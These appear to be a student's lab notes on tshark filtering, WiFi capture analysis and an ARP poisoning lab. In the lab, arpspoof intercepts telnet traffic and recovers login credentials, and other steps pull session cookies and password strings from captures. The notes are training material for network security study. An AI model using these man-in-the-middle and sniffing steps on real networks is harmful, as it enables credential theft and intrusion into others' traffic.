🔬Tshark, ARP, WiFi
Lab 1
Tshark usage
tshark -v
TShark (Wireshark) 2.6.1 (Git v2.6.1 packaged as 2.6.1-0ubuntu2~16.04.0)
📌 Running Tshark version is
2.6.1
tshark -D
These are all supported network interfaces for monitoring

Sniff some traffic on
eth0
tshark -i eth0

📌
student
user don't have permission to capture oneth0
interface
Display the packet list of the
.pcap
file
tshark -r HTTP_traffic.pcap
Count
.pcap
file number of lines to find total number of packets
tshark -r HTTP_traffic.pcap | wc -l
30418 # lines in the file

Read first 100 packets from the
.pcap
file
tshark -r HTTP_traffic.pcap -c 100
List the Protocol Hierarchy Statistics from the
.pcap
file
tshark -r HTTP_traffic.pcap -z io,phs -q

Lab 2
Tshark usage and filtering
Filtering
Show the
HTTP
traffic from a.pcap
file
tshark -r HTTP_traffic.pcap -Y 'http'
tshark -r HTTP_traffic.pcap -Y 'http' | more

Show only the IP packets sent from IP address
192.168.252.128
to IP address52.32.74.91
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"

Print only packets containing GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"

Print only packets with frame time, source IP and URL for all GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri

Print packets containing a string
tshark -r HTTP_traffic.pcap -Y "http contains password"

📌
4
HTTP packets contain thepassword
string
Check the destination IP for
GET
requests sent towww.nytimes.com
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e ip.dst

📌
170.149.159.130
is the destination IP ofwww.nytimes.com
Check the session ID used by
192.168.252.128
foramazon.in
tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e http.cookie

📌
278-7381968-4337153
is the session ID
Find the OS type on the machine with IP
192.168.252.128
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent

Use the
User_agent
string to find the specific distribution
Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
📌 The OS is
Linux x86_64; rv:31.0
- user-agents.net
Lab 3 - ARP Poisoning
🔬 INE Platform Lab
ARP Poisoning attack to a
telnet
server
the client machine authenticates with the
telnet
server every 30secFind the
telnet
login credentialsTools:
arpspoof
&Wireshark
Monitor the traffic on
eth1
interface of the Kali Attacker machine.
ip -br -c a
eth1 UP 10.100.13.140/24
Enumeration
nmap 10.100.13.0/24
Nmap scan report for 10.100.13.1
22/tcp open ssh
3389/tcp open ms-wbt-server
# ^^ Gateway machine, do not attack
Nmap scan report for 10.100.13.36
22/tcp open ssh
23/tcp open telnet
# ^^ Telnet server machine
Nmap scan report for 10.100.13.140
3389/tcp open ms-wbt-server
5910/tcp open cm
# ^^ Client machine

ARP Poisoning Attack
To see traffic of other machines, configure Kali Attacker VM to forward IP packets
echo 1 > /proc/sys/net/ipv4/ip_forward
Start the ARP poisoning attack with the
arpspoof
tool
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36
# -t = target
# -r = host
Open
Wireshark
and start captureeth1
trafficApply
telnet
filter

Follow the TCP stream and find the
telnet
credentialsStop the capture and the
arpspoof
tool

📌
Telnet
credentials areadmin
:MyS3cr3tP455
telnet 10.100.13.36

Lab 4 - WiFi Traffic Analysis
🔬 WiFi Security: Traffic Analysis I
WiFi basic traffic analysis with
Wireshark
Find the name of the Open SSID in the packet dump, using the filter
Beacon frame =
0x0008
Wlan tag
48
= RSN-IE (Robust Security Network Information Element)
(wlan.fc.type_subtype == 0x0008) && (!(wlan.wfa.ie.wpa.version == 1)) &&
!(wlan.tag.number == 48)

Find the channel
Home_Network
is operating
wlan contains Home_Network

Find which security mechanism has
LazyArtists
SSID
wlan contains LazyArtists

Check the WPS setup for
Amazon Wood
SSID
(wlan.ssid contains "Amazon") && (wlan.fc.type_subtype == 0x0008)
📌 WPS is enabled

Count the packets of the device with MAC
e8:de:27:16:87:18
wlan.ta = transmitted
wlan.ra = received
(wlan.ta == e8:de:27:16:87:18) || (wlan.ra == e8:de:27:16:87:18)

Find a specific MAC address which exchange data with
SecurityTube_Open
SSIDSecurityTube_Open
is hosted on BSSIDe8:de:27:16:87:18
(wlan.bssid == e8:de:27:16:87:18) && (wlan.fc.type_subtype == 0x0020)

Find TSF timestamp of the Association Response sent from the
SecurityTube_Open
access point to a station
((wlan.bssid == e8:de:27:16:87:18) && (wlan.addr==5c:51:88:31:a0:3b)) &&
(wlan.fc.type_subtype == 0x0001)

Lab 5 - WiFi Traffic Filtering
Tshark usage and filtering
Show only WiFi traffic
tshark -r WiFi_traffic.pcap -Y "wlan"

Show only the deauthentication packets
Every management frame in WiFi has can be classified under a type and subtype
wlan.fc.type_subtype == 0x000c
- AP sends deauthentication frames
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c"

Show only the
WPA handshake
packetsEAPoL (Extensible Authentication Protocol over LAN) is used for WPA handshake
tshark -r WiFi_traffic.pcap -Y "eapol"

Show only SSID and BSSID values of all beacon frames
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid

Check the BSSID of
LazyArtists
SSID
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid

📌
LazyArtists
BSSID isfc:b0:c4:91:71:e0
.
Show the channel on which
Home_Network
operates
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e wlan_radio.channel

📌
Home_Network
operating channel is6
.
Show the two devices that received the deauth messages
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra

📌 The MAC address of the two devices are
6c:19:8f:5f:81:74
andbc:ae:c5:c3:5e:01
.
Check vendor and model of the device with MAC
5c:51:88:31:a0:3b
tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent

📌 The device is a Motorola MotoG3.
Last updated
Was this helpful?